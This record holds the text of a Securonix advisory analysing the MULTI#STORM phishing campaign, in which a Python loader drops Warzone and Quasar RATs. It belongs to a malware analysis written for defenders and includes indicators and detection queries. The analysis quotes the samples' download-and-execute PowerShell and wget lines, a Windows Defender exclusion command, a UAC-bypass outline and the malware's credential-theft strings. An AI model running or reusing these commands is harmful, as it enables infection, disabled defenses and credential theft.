{ "id": "b3bc3b9b-8112-4e45-95c3-e80ec5a51f66", "created_at": "2026-04-06T00:17:35.127724Z", "updated_at": "2026-04-10T03:36:48.330932Z", "deleted_at": null, "sha1_hash": "2059e9884e9b1c429b5ccd41ceefebc54f06d683", "title": "Securonix Threat Labs Security Advisory: New MULTI#STORM Attack Campaign Involving Python-based Loader Masquerading as OneDrive Utilities Dropping Multiple RAT Payloads Using Security Analytics", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 18302679, "plain_text": "Securonix Threat Labs Security Advisory: New MULTI#STORM Attack\r\nCampaign Involving Python-based Loader Masquerading as OneDrive\r\nUtilities Dropping Multiple RAT Payloads Using Security Analytics\r\nArchived: 2026-04-05 18:28:06 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nJune 21, 2023\r\nTL;DR\r\nMULTI#STORM, an interesting attack campaign involving Python-based loader malware was recently seen being used to\r\ndeliver Warzone RAT infections using phishing emails.\r\nAn interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when\r\nthe user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. Some of the victims\r\ntargeted by the MULTI#STORM campaign appear to be in the US and India.\r\nThe attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances,\r\nsuch as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection\r\nchain.\r\nThe loader which is responsible for the initial compromise of the host is rather interesting. It functions very similarly to\r\nDBatLoader which shares common TTPs, however this malware is coded in Python and packed using PyInstaller and\r\nleverages some rather sophisticated techniques to establish persistence and bypass detections before dropping the RAT\r\npayloads.\r\nAttack chain overview\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 1 of 13\n\nFigure 1: MULTI#STORM attack chain\r\nThe attack kicks off like so many others, with a phishing email which has an embedded link. The link references a request\r\nfor quote which directs the user to a Microsoft OneDrive file for the victim to download:\r\nhxxps://onedrive.live[.]com/download?\r\ncid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D!152\u0026authkey=AErksvWpjzpD_Ag\r\nIn this example, the OneDrive link downloads a ~500KB password protected zip file called “REQUEST.zip” with the\r\npassword of “12345”.\r\nWhen the zip file is extracted, the target user is presented with a single JScript file named REQUEST.js. It’s surprising that\r\nthere was no attempt to obfuscate the file by using .LNK execution, or at the very least a double extension to masquerade as\r\na different file type.\r\nCode execution: JScript\r\nAssuming that the user double clicks the REQUEST.js file, this is where our code execution begins. The JScript file’s code\r\nis heavily obfuscated as seen in the figure below.\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 2 of 13\n\nFigure 2: Obfuscated JScript sample (REQUEST.js)\r\nIn addition to the obfuscation, the JS file also contains a massive amount of padding at the end of the script using exactly\r\n509992 zero characters. This methodology can assist in bypassing AV in binary files, or this could be an attempt to inflate\r\nthe original ZIP file’s size to thwart AV analysis or brute forcing.\r\nThe purpose of this script is to execute two PowerShell commands which download and execute two separate files from two\r\ndifferent OneDrive URLs.\r\nOnce deobfuscated, we’re presented with two PowerShell one liners, kicked off by cmd.exe:\r\ncmd /c powershell.exe -Command “Invoke-WebRequest -Uri ‘hxxps://onedrive.live[.]com/download?\r\ncid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21148\u0026authkey=ADY1aqOba7HnNZs\u0026em=2’ -OutFile\r\n‘C:\\Users\\Public\\Libraries\\files.pdf’”\r\ncmd /c powershell.exe -Command “Invoke-WebRequest -Uri ‘hxxps://onedrive.live[.]com/download?\r\ncid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21151\u0026authkey=AGCMruhQJESxca4’ -OutFile\r\n‘C:\\Users\\Public\\Libraries\\stemp’”\r\nThe two files are downloaded to the C:\\Users\\Public\\Libraries directory, a common staging area for malware as it will have\r\nworld-writable permissions. Once downloaded the files are both executed near simultaneously.\r\nThe first file download is the lure file. This simply runs so as to not alert the user that anything suspicious happened and that\r\nsome form of expected outcome derives from the action of clicking the “request”.\r\nFigure 3: Lure file (files.pdf)\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 3 of 13\n\nThe lure file is downloaded from OneDrive as spread.pdf and is saved to the disk as files.pdf. It’s simply executed and will\r\nbe opened to the user in the default PDF reader.\r\nDropper: news.exe\r\nThe downloaded binary file “stemp” then renamed to “news.exe” is a Python-packed executable using PyInstaller. As with\r\nany Windows Python executable it’s quite large at 6.6MB.\r\nFigure 4: news.exe binary file overview (Detect It Easy)\r\nThe news.exe file acts as a loader or dropper. As with the case of this malware, all of the further malware stages are packed\r\ninside the binary’s source and as you’ll see, encoded as long blobs of Base64 strings. These then get decoded and written to\r\ndisk, staging inside the “C:\\Users\\Public\\Libraries” directory.\r\nOnce we were able to extract the original Python source code, the functions of the dropper became a bit more clear.\r\nInterestingly enough, the dropper includes printed messages describing its process as functions are called. An example of\r\nthis can be seen in figure 5 below.\r\nFigure 5: Python source code example\r\nBased on our analysis, the news.exe dropper accomplishes the following tasks while sleeping between some of the steps:\r\n1. Drops the startup icon file into: C:\\Users\\Public\\Libraries\\onedrive.ico\r\n2. Drops and compiles a shortcut file into: C:\\Users\\Public\\Libraries\\OneDrive\\Storm.lnk\r\n3. Creates a registry key for persistence, which executes C:\\Users\\Public\\Libraries\\OneDrive.url (see persistence below\r\n4. Runs a function which executes werfault.exe 40 times on a loop.\r\n5. Decodes a zip file from a Base64 string.\r\n6. Saves this zip file as C:\\Users\\Public\\Libraries\\files.zip and extracts its contents into C:\\Users\\Public\\Libraries\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 4 of 13\n\n7. Runs C:\\Users\\Public\\Libraries\\check.bat for bypassing AV to set AV exclusions. See below\r\n8. Decompile “Storm.exe” from Base64\r\n9. Creates C:\\Users\\Public\\Libraries\\OneDrive Update\\Exec.lnk which is also used for persistence to execute storm.exe\r\nstorm.lnk\r\nAs noted above, the binary drops two shortcut files (.lnk) files upon execution. The first “storm.lnk” when called using a\r\nstartup registry key will download and execute “S.exe”. This is called by the shortcut file linking to the PowerShell process\r\nwith the appended command line:\r\nwget ‘hxxps://onedrive.live[.]com/download?\r\ncid=4A89E2A4EA0448C0\u0026resid=4A89E2A4EA0448C0%21130\u0026authkey=ABwx94zEGC3SmxA’ -Outfile\r\nC:\\Users\\Public\\Libraries\\S.exe; powershell C:\\Users\\Public\\Libraries\\S.exe\r\nFigure 6: Storm.lnk created by news.exe\r\nExec.lnk\r\nAdditionally, “Exec.lnk” is also created in the same directory. Also used for persistence, this file simply runs “Storm.exe”\r\nfrom PowerShell using the “saps” or “Start-Process” alias.\r\nFigure 7: Exec.lnk created by news.lnk\r\nFiles.zip\r\nAs with all of the other files generated from news.exe, this file gets decoded from a Base64 blob, and its contents are\r\nextracted into the “C:\\Users\\Public\\Libraries” directory. The purpose of each of these files is simply to bypass UAC, which\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 5 of 13\n\nwe’ll dive into in the next section.\r\nFigure 8 Files.zip contents\r\nCheck.bat and UAC bypass\r\nThe contents of Check.bat shows that it is using a less-common UAC bypass technique with the “Mock Trusted Directories\r\nMethod” with an end goal of executing “KDECO.bat”.\r\nThe batch file is identical to one documented in Sentinel One’s analysis of DBatLoader. This loader and DBatLoader  share\r\nmany similar TTPs, however since this particular loader is coded and compiled in Python, whereas DBatLoader is written in\r\nDelphi.\r\nFigure 9: check.bat code\r\nThis UAC bypass technique was first discovered back in 2020 by threat researcher Daniel Gebert. It involves using a\r\ncombination of DLL hijacking along with a mock trusted directories technique to execute a command or script without\r\nprompting the user for elevated permissions.\r\nThe script first creates a new directory structure masquerading as the System32 directory (notice the space): C:\\Windows\r\n\\System32\r\nIt then copies the files “easinvoker.exe”, “netutils.dll”, and “KDECO.bat” into the newly created directory. “easinvoker.exe”\r\nis then executed to run “EKECO.bat” with elevated permissions.\r\nTo ensure that the command has time to execute, Check.bat silently runs a ping six times against the local IP, and then cleans\r\nup all of the created files and folders.\r\nKDECO.bat\r\nThe purpose of this file is to execute a single PowerShell command to instruct Windows Defender to add an AV exclusion to\r\nanything in the “C:\\Users” directory.\r\nstart /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command “Add-MpPreference -ExclusionPath ‘C:\\Users’” \u0026 exit\r\nDropper persistence methods\r\nPersistence on the host is established by the news.exe binary file by creating two registry keys which will execute upon\r\nstartup.\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 6 of 13\n\nThe first created registry key points to the decoded Base64 blob, “storm.exe” which is called using “Exec.lnk”. The registry\r\nkey “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive Update” is created which contains a value of\r\n“C:\\Users\\Public\\Libraries\\OneDrive.url” If you recall, the purpose of this file is simply to download and execute S.exe.\r\n“wget ‘https://onedrive.live.com/download?\r\ncid=4A89E2A4EA0448C0\u0026resid=4A89E2A4EA0448C0%21130\u0026authkey=ABwx94zEGC3SmxA’ -Outfile\r\nC:\\Users\\Public\\Libraries\\S.exe; powershell C:\\Users\\Public\\Libraries\\S.exe\r\nThe registry key “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive Update File” is also created which\r\npoints to C:\\Users\\Public\\\\Libraries\\OneDrive Update.url. This shortcut file simply executes Storm.exe using the following\r\nPowerShell command:\r\nsaps “C:\\Users\\Public\\Libraries\\Storm.exe\r\nFigure 10: contents of OneDrive.url and OneDrive Update.url\r\nStorm.exe – Warzone RAT payload\r\nAt this stage, the loader malware has accomplished its goal of extracting the main RAT payload “Storm.exe”, inhibiting\r\ndefenses by disabling AV inside the malware staging area, and maintaining persistence on the host.\r\nWarzone RAT or Ave Maria allows for remote access to the infected host through stealthy connection strings and hidden\r\nprocesses. Warzone markets itself as a malware-as-a-service (MaaS). Currently, it’s listed at $38 USD/month which puts it in\r\nthe REMCOS price range. Warzone contains the following feature set:\r\nEncrypted C2 communication\r\nNative, independent stub (C++)\r\nCookies recovery\r\nRemote desktop\r\nHidden remote desktop – HRDP\r\nPrivilege escalation – UAC bypass\r\nRemote webcam\r\nPassword recovery\r\nFile manager\r\nDownload \u0026 execute\r\nLive/offline keylogger\r\nRemote shell\r\nProcess manager\r\nReverse proxy\r\nAutomatic tasks\r\nMass execute\r\nSmart updater\r\nHRDP WAN direct connection\r\nPersistence\r\nWindows Defender bypass\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 7 of 13\n\nStorm.exe is overall quite lightweight at only 113KB. Its execution begins inside the “C:\\Users\\Public” directory which,\r\nthanks to the UAC bypass technique, should no longer trigger any AV alerts from any malicious activity from within.\r\nFigure 11: storm.exe binary file overview (detect it easy)\r\nBased on our analysis the RAT contains many functions which line up with the advertised feature set. The credential theft\r\nfunctionality is quite robust. It not only goes after some of the more traditional credentials stored in Windows, or browsers,\r\nbut installed software such as Outlook, Foxmail, and Thunderbird to name a few.\r\nBrowser data theft functionality and other registry queries used to steal credentials can be seen in a couple of the functions\r\nbelow:\r\nFigure 12: storm.exe – browser and software credentials\r\nDuring our static analysis of Storm.exe we observed the following details of Warzone RAT:\r\nFunctionality Details/description\r\nOdd strings\r\n“Ave_Maria Stealer OpenSource github Link: hxxps://github[.]com/syohex/java-simple-mine-sweeper”\r\n“C:\\\\Users\\\\Vitali Kremez\\\\Documents\\\\MidgetPorn\\\\workspace\\\\MsgBox.exe”\r\n“?lst@@YAXHJ@Z”\r\n“BQAaR$43!QAFff”\r\nExecution of\r\n“programs.bat”\r\nExecute\r\napplication\r\nthrough\r\n“for /F \\”usebackq tokens=*\\” %%A in (\\”\r\n:ApplicationDat\r\n“wmic process call create \\’\\”\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 8 of 13\n\nFunctionality Details/description\r\nWMIC\r\n(wmiprsrv.exe)\r\nConnectivity\r\ncheck\r\n“cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 \u003e Nul \u0026 Del /f /q “\r\nAnother UAC\r\nbypass using\r\nsdclt\r\nRegistry changes to “Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command”\r\nRun “%windir%\\system32\\sdclt.exe”\r\nExclude a\r\nchosen file or\r\npath from\r\nWindows\r\nDefender\r\npowershell Add-MpPreference -ExclusionPath “”\r\nSearch for files\r\nfind.exe\r\n“-w %ws -d C -f %s”\r\nIncrease\r\nmaximum\r\nnumber of\r\nserver\r\nconnections\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\r\nMaxConnectionsPer1_0Server\r\nMaxConnectionsPerServer\r\nEnable remote\r\nconnections\r\nthrough the\r\nWindows\r\nregistry\r\n(keys\r\naccessed)\r\n“SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server”\r\n“SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Licensing Core\\EnableConcurrentSessions”\r\n“SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\EnableConcurrentSessions”\r\n“SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\AddIns”\r\n“SYSTEM\\\\CurrentControlSet\\\\ControlTerminal Server\\\\AddIns\\\\Clip Redirector”\r\n“SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\AddIns\\\\Dynamic VC”\r\nChromium\r\nbrowser\r\nsecrets decrypt\r\nos_crypt\\”:{\\”encrypted_key\\\r\nIE credential\r\ntheft\r\nvaultcli.dll, “VaultOpenVault”, “VaultCloseVault”, “VaultEnumerateItems”, “VaultGetItem”, “VaultGetItem”, “VaultFree”\r\nMozilla\r\nbrowser\r\ncredential theft\r\n“Softokn3.dll”,”msvcp140.dll”,”mozglue.dll,vcruntime140.dll,”freebl3.dll”,”nss3.dll”\r\n“NSS_Init”,”PK11_GetInternalKeySlot”,”PK11_Authenticate”,”PK11SDR_Decrypt”,”NSSBase64_DecodeBuffer”,”PK11_CheckU\r\nSoftware\r\ncredential\r\nscraping\r\nthrough\r\nWindows\r\nregistry\r\nSoftware\\\\Microsoft\\\\Office\\\\15.0Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\nSoftware\\\\Microsoft\\\\Office\\\\15.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A667\r\nSoftware\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows Messaging Subsystem\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A0\r\nSoftware\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows Messaging Subsystem\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A0\r\nSoftware\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles\\\\9375CFF0413111d3B88A00104B2A6676\r\nSoftware\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles\\\\9375CFF0413111d3B88A00104B2A667\r\nSoftware\\\\Microsoft\\\\Office\\\\16.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\nSoftware\\\\Microsoft\\\\Office\\\\16.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\nWhen it comes to browser data, this version of Warzone RAT attempts to extract cookies and credentials from the following\r\nbrowsers:\r\nGoogle Chrome\r\nEpic Privacy Browser\r\nMicrosoft Edge\r\nUCBrowser\r\nQQ Browser\r\nOpera\r\nBlisk\r\nChromium\r\nBrave browser\r\nVivaldi\r\nComodo\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 9 of 13\n\nTorch\r\nSlimjet\r\nCentBrowser\r\nMozilla Firefox\r\nPost exploitation analysis\r\nDuring our dynamic analysis of the entire attack chain, we were able to observe the attackers from behind the Warzone RAT\r\npayload. Two additional files “euyjrxpgo6ua.bat” and “quas.exe” were downloaded to “C:\\Users\\Public\\Libraries\\” which\r\ncame from the URL: 134.19.179[.]147:38046/dominion46.ddns[.]net.\r\nThe batch file contained the following code, which essentially is used for OpSec purposes to clean up the two files.\r\n@echo off\r\nchcp\r\necho DONT CLOSE THIS WINDOW!\r\nping -n 10 localhost \u003e nul\r\ndel /a /q /f “C:\\Users\\Public\\Libraries\\Quas.exe”\r\ndel /a /q /f “C:\\Users\\[redacted]\\AppData\\Local\\Temp\\EuYJrxpgO6uA.bat”\r\nThe quas.exe binary is simply a compiled client of QuasarRAT, which is an open source “administration tool” which\r\nfeatures many RAT-like capabilities, and is flagged by almost every AV vendor.\r\nFigure 13: quas.exe VirusTotal analysis\r\nSince Quazar has been around for a while, and is open source, we won’t be going deeper into this particular payload. Once\r\nQuasarRAT was executed by the attacker we observed it connecting to the same IP, though under a different port:\r\n134[.]19.179.147:29185/dominion46.ddns[.]net .\r\nC2 and infrastructure\r\nEarly in the attack chain, the Python-based loader malware used Microsoft OneDrive links to stage various payloads. RAT\r\nconnection payloads took an interesting turn where they would connect directly to an IP:Port combination, with a fake\r\nappended .ddns.net URL. This is likely done as an attempt to throw off NIDS-based detections.\r\nBelow are a list of all network based connections used throughout the campaign:\r\nConnection IP/URL Description\r\nhxxps://lo3kcg.bl.files.1drv[.]com/y4mtafF_tQM7vAFHxOASpTWOq0M5qmXCnd8FhdFvHvKOxYaA1h-ocJsybIp-r0iMVcK8UH6WP-fFspS6l-aP6uTlpsy11crZ_p_HfMxTI4yymzBqVkLX-v4nQLrn2Ty0-\r\nilIRzICAbtwbooanM9U97qPmTgUNxhC9ab_4VfNvcmiWFeami9lwl35D8Eb7UiF7TCJTo_0XyAatlemjaXw9zAlw/REQUEST.zip?\r\ndownload\u0026psid=1\r\n– redirects to —\r\nDownload\r\nphishing lure\r\n“REQUEST.zi\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 10 of 13\n\nConnection IP/URL Description\r\nhxxps://onedrive.live[.]com/download?\r\ncid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D!152\u0026authkey=AErksvWpjzpD_Ag\r\nhxxps://onedrive.live[.]com/download?\r\ncid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21151\u0026authkey=AGCMruhQJESxca4\r\nDownload\r\n“news.exe”\r\nhxxps://onedrive.live[.]com/download?\r\ncid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21148\u0026authkey=ADY1aqOba7HnNZs\u0026em=2\r\nDownload\r\n“files.pdf”\r\nhxxps://onedrive.live[.]com/download?\r\ncid=4A89E2A4EA0448C0\u0026resid=4A89E2A4EA0448C0%21130\u0026authkey=ABwx94zEGC3SmxA\r\nDownload\r\n“S.exe”\r\n134[.]19.179.147:38046/dominion46.ddns[.]net\r\nStorm.exe\r\nconnection\r\nstring\r\n134[.]19.179.147:29185/dominion46.ddns[.]net\r\nquas.exe\r\nconnection\r\nstring\r\nSecuronix recommendations and mitigations\r\nIt’s important to remain extra vigilant when it comes to phishing emails, especially when a sense of urgency is stressed. This\r\nparticular lure was generally unremarkable as it would require the user to execute a JavaScript file directly. Shortcut files, or\r\nfiles using double extensions would likely have a higher success rate.\r\nWhen it comes to prevention and detection, the Securonix Threat Research Team recommends:\r\nAvoid opening any attachments especially from those that are unexpected or are from outside the organization, ZIP\r\nfiles in particular in regards to this campaign.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries.\r\nMonitor publicly writable directories such as any temp directory, “C:\\Users\\Public” or “C:\\ProgramData\\” as these\r\nare typical areas used to stage malware.\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection\r\ncoverage.\r\nMonitor for the usage of OneDrive links, especially if OneDrive is not used by the organization.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nMITRE ATT\u0026CK matrix\r\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nDefense Evasion\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1055.002: Process Injection: Portable Executable Injection\r\nPersistence\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1053.005: Scheduled Task/Job: Scheduled Task\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nCollection\r\nT1056.001: Input Capture: Keylogging\r\nT1113: Screen Capture\r\nT1115: Clipboard DataT1119: Automated Collection\r\nAnalyzed file hashes\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 11 of 13\n\nFile Name SHA256 (IoC)\r\nREQUEST.zip 8674817912be90a09c5a0840cd2dff2606027fe8843eb868929fc33935f5511e\r\nREQUEST.js 3783acc6600b0555dec5ee8d3cc4d59e07b5078dd33082c5da279a240e7c0e79\r\nnews.exe 18C876A24913EE8FC89A146EC6A6350CDC4F081AC93C0477FF8FC054CC507B75\r\nfiles.pdf 31960A45B069D62E951729E519E14DE9D7AF29CB4BB4FB8FEAD627174A07B425\r\nnetutils.dll 02212f763b2d19e96651613d88338c933ddfd18be4cb7e721b2fb57f55887d64\r\ncheck.bat 5A11C5641C476891AA30E7ECFA57C2639F6827D8640061F73E9AFEC0ADBBD7D2\r\neasinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96\r\nKDECO.bat 37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E\r\nExec.lnk F9130B4FC7052138A0E4DBAAEC385EF5FAE57522B5D61CB887B0327965CCC02A\r\nStorm.lnk 0E799B2F64CD9D10A4DFED1109394AC7B4CCC317A3C17A95D4B3565943213257\r\nOneDrive Update.url 455ED920D79F9270E8E236F14B13ED4E8DB8DD493D4DABB05756C867547D8BC7\r\nOneDrive.url 9C14375FBBCE08BCF3DC7F2F1100316B2FB745FA2C510F5503E07DB57499BFC8\r\nstorm.exe B452A2BA481E881D10A9741A452A3F092DFB87BA42D530484D7C3B475E04DA11\r\nS.exe AB0212F8790678E3F76ED90FBA5A455AC23FBB935CF99CABC2515A1D7277676F\r\nquas.exe 4A834B03E7FAFFEF929A2932D8E5A1839190DF4D5282CEF35DA4019FE84B19A5\r\neuyjrxpgo6ua.bat 11408368F4C25509C24017B9B68B19CE5278681F6F12CE7DB992D3C6124B0A23\r\nRelevant Securonix detection policies\r\nEDR-ALL-1212-RU\r\nEDR-ALL-1227-RU\r\nWEL-ALL-1194-RU\r\nWEL-ALL-1192-RU\r\nEDR-ALL-1228-RU\r\nEDR-ALL-1098-RU\r\nEDR-ALL-1120-RU\r\nEDR-ALL-941-RU\r\nEDR-ALL-993-RU\r\nRelevant Spotter queries\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR\r\nrg_functionality = “ Proxy”) AND destinationaddress = “134[.]19.179.147”\r\nindex = activity AND rg_functionality = “Web Proxy” AND requesturl CONTAINS “onedrive.live[.]com” AND\r\n(requesturl CONTAINS “AErksvWpjzpD_Ag” OR requesturl CONTAINS “AGCMruhQJESxca4” OR requesturl\r\nCONTAINS “ADY1aqOba7HnNZs” OR requesturl CONTAINS “ABwx94zEGC3SmxA”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\n(destinationprocessname = “ConfigSecurityPolicy.exe” OR filename = “ConfigSecurityPolicy.exe”) AND\r\n(resourcecustomfield1 CONTAINS “http://” OR resourcecustomfield1 CONTAINS “https://”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” AND sourceprocessname = “explorer.exe” AND\r\nresourcecustomfield1 CONTAINS “powershell” AND resourcecustomfield1 CONTAINS “.lnk “\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” AND destinationprocessname STARTS WITH\r\n“C:\\Windows \\System32\\”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (baseeventid = “12” OR\r\nbaseeventid = “13” OR baseeventid = “14”) AND transactionstring5 = “SetValue” AND customstring47 CONTAINS\r\n“Classes\\Folder\\shell\\open\\command\\(Default)” AND (customstring48 CONTAINS “cmd.exe” OR customstring48\r\nCONTAINS “powershell.exe”)\r\nReferences:\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 12 of 13\n\n1. Bypassing Windows 10 UAC with mock folders and DLL hijacking\r\nhttps://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/\r\n2. Yet another sdclt UAC bypass\r\nhttps://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\r\n3. Increasing simultaneous network connections to 10 for various applications\r\nhttps://social.technet.microsoft.com/Forums/ie/en-US/c95a72de-f7ba-4258-b179-da0ca4d9ca84/increasing-simultaneous-network-connections-to-10-for-various-applications?forum=ieitprocurrentver\r\n4. Decrypting Browser Passwords \u0026 Other “Secrets”\r\nhttps://www.alertra.com/blog/decrypting-browser-passwords-other-secrets\r\n5. The Secrets of Internet Explorer Credentials\r\nhttps://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentials\r\n6. The Secrets of Firefox Credentials\r\nhttps://www.codeproject.com/Articles/1167954/The-Secrets-of-Firefox-Credentials\r\n7. DBatLoader/ModLoader Analysis – First Stage\r\nhttps://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/\r\nSource: https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-pay\r\nloads/\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/" ], "report_names": [ "securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", 